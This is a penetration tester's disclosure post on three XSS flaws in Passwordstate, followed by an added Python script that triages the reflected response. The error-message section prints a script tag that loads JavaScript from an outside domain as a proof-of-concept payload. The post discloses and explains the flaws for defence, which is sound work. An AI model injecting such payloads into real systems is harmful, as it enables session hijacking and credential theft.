I recently performed a penetration test against an instance of Clickstudios Passwordstate, a web-based enterprise password management solution.
During testing, three cross-site scripting (XSS) issues were identified. This blog post serves as public disclosure of those issues, tracked as CVE-2018-14776, which have since been patched by Clickstudios.
Testing was performed against Passwordstate v8.2 (Build 8256).
1. Uploaded Files
An HTML file named ‘test.html’ containing the payload below was uploaded; the application stored it and served it back to the browser, demonstrating persistent (stored) XSS:
2. External Links
An authenticated user can add a link to an external URL through the user interface. It was possible to submit an external URL containing the following payload:
The link containing the persistent XSS payload only appears to be visible to the user who created it, so this issue is only useful in limited scenarios: for example, an attacker who has compromised an account could add a malicious link in the hope that the legitimate owner of that account later clicks it.
3. Error Messages
Several pages that accept JSON return an error message that echoes the invalid input without encoding it, which makes those parameters reflected XSS vectors. For example, a POST request to /passwords/shared/folder.aspx was sent with the following value in the DocumentsDock_ClientState parameter:
This request could only be submitted by an authenticated user, and it resulted in the following response from the application:
HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache,no-cache
Content-Type: text/plain; charset=utf-8
Expires: -1,Thu, 01 Jan 1970 00:00:00 GMT
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=edge
Date: Tue, 15 May 2018 05:24:21 GMT
Connection: close
Content-Length: 97

83|error|500|Invalid JSON primitive: <script src="https://www.datacomtss.com.au/x.js"></script>.|
This confirms that the submitted value is reflected into the error message without HTML encoding. Note that the response is served as text/plain and carries no X-Content-Type-Options: nosniff header: Internet Explorer's MIME sniffing treated the body as HTML, so the external proof-of-concept script executed in Internet Explorer, whereas browsers that render the body as plain text will not execute it.
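The following is an added example, not code from the original post or from Passwordstate: a small Python triage script that parses the response above (reproduced here as constructed sample input), validates the ASP.NET callback framing of the body (length|type|id|content|), and reports whether the unencoded reflection is likely to execute, based on the declared Content-Type and the presence or absence of X-Content-Type-Options: nosniff. The helper names and verdict labels are this example's own; the build_* helpers exist only so a hardened variant of the same response (HTML-encoded content plus nosniff) can be compared against the vulnerable one.

```python
"""Triage helper for reflected input in an ASP.NET callback error response.

Added example, not code from the original post or from Passwordstate.
SAMPLE_RESPONSE is a constructed copy of the response shown in the post;
helper names and verdict labels are this example's own conventions.
"""
import html

# Proof-of-concept marker reflected in the post's response.
MARKER = '<script src="https://www.datacomtss.com.au/x.js"></script>'

# Constructed sample input: the response from the post, with CRLF line ends.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Cache-Control: no-cache,max-age=0, no-cache, no-store, must-revalidate\r\n"
    "Pragma: no-cache,no-cache\r\n"
    "Content-Type: text/plain; charset=utf-8\r\n"
    "Expires: -1,Thu, 01 Jan 1970 00:00:00 GMT\r\n"
    "Server: Microsoft-IIS/10.0\r\n"
    "X-Powered-By: ASP.NET\r\n"
    "X-UA-Compatible: IE=edge\r\n"
    "Date: Tue, 15 May 2018 05:24:21 GMT\r\n"
    "Connection: close\r\n"
    "Content-Length: 97\r\n"
    "\r\n"
    "83|error|500|Invalid JSON primitive: " + MARKER + ".|"
)


def parse_response(raw):
    """Split a raw HTTP/1.x response into (status_line, headers, body).
    Header names are lower-cased; repeated headers are joined with ', '."""
    head, sep, body = raw.partition("\r\n\r\n")
    if not sep:
        raise ValueError("no end of headers found")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")  # first colon only: values may hold ':'
        name, value = name.strip().lower(), value.strip()
        headers[name] = value if name not in headers else headers[name] + ", " + value
    return lines[0], headers, body


def parse_callback_body(body):
    """Parse ASP.NET async-postback framing 'len|type|id|content|' into a list
    of (type, id, content). The length field is trusted only after checking
    that the content it delimits is followed by the closing '|'."""
    records, pos = [], 0
    while pos < len(body):
        parts = body[pos:].split("|", 3)  # len, type, id, rest-of-body
        if len(parts) < 4:
            raise ValueError("truncated record at offset %d" % pos)
        length, rec_type, rec_id, rest = int(parts[0]), parts[1], parts[2], parts[3]
        content = rest[:length]
        if len(content) != length or rest[length:length + 1] != "|":
            raise ValueError("length field does not match content at offset %d" % pos)
        records.append((rec_type, rec_id, content))
        pos += len(parts[0]) + len(rec_type) + len(rec_id) + 3 + length + 1
    return records


def build_callback_body(records, escape=False):
    """Frame (type, id, content) records; escape=True HTML-encodes content,
    which is the server-side fix for the error message discussed above."""
    out = []
    for rec_type, rec_id, content in records:
        if escape:
            content = html.escape(content, quote=True)
        out.append("%d|%s|%s|%s|" % (len(content), rec_type, rec_id, content))
    return "".join(out)


def build_response(headers, body):
    """Assemble a 200 response from (name, value) pairs, adding Content-Length."""
    lines = ["HTTP/1.1 200 OK"] + ["%s: %s" % (n, v) for n, v in headers]
    lines.append("Content-Length: %d" % len(body.encode("utf-8")))
    return "\r\n".join(lines) + "\r\n\r\n" + body


def assess_reflection(raw, marker):
    """Report whether `marker` is reflected unencoded and whether the declared
    Content-Type / nosniff header would let a browser execute it."""
    _, headers, body = parse_response(raw)
    declared = headers.get("content-length")
    if declared is not None and int(declared) != len(body.encode("utf-8")):
        raise ValueError("Content-Length does not match body")
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    nosniff = headers.get("x-content-type-options", "").strip().lower() == "nosniff"
    reflected = marker in body
    encoded = (not reflected) and html.escape(marker, quote=True) in body
    if reflected and ctype == "text/html":
        verdict = "exploitable"          # any browser renders this as HTML
    elif reflected and not nosniff:
        verdict = "ie-sniffable"         # the text/plain case from the post
    elif reflected:
        verdict = "reflected-non-html"   # unencoded, but nosniff blocks sniffing
    elif encoded:
        verdict = "encoded"              # reflected safely
    else:
        verdict = "not-reflected"
    return {"verdict": verdict, "content_type": ctype, "nosniff": nosniff,
            "reflected": reflected, "encoded": encoded}
```

Running assess_reflection(SAMPLE_RESPONSE, MARKER) yields the "ie-sniffable" verdict because the marker is reflected verbatim into a text/plain body with no nosniff header, which matches the behaviour observed in Internet Explorer. Re-framing the same error record with escape=True and serving it with X-Content-Type-Options: nosniff yields "encoded". The verdict is a triage heuristic for this one marker; it says nothing about other injection points or other encodings.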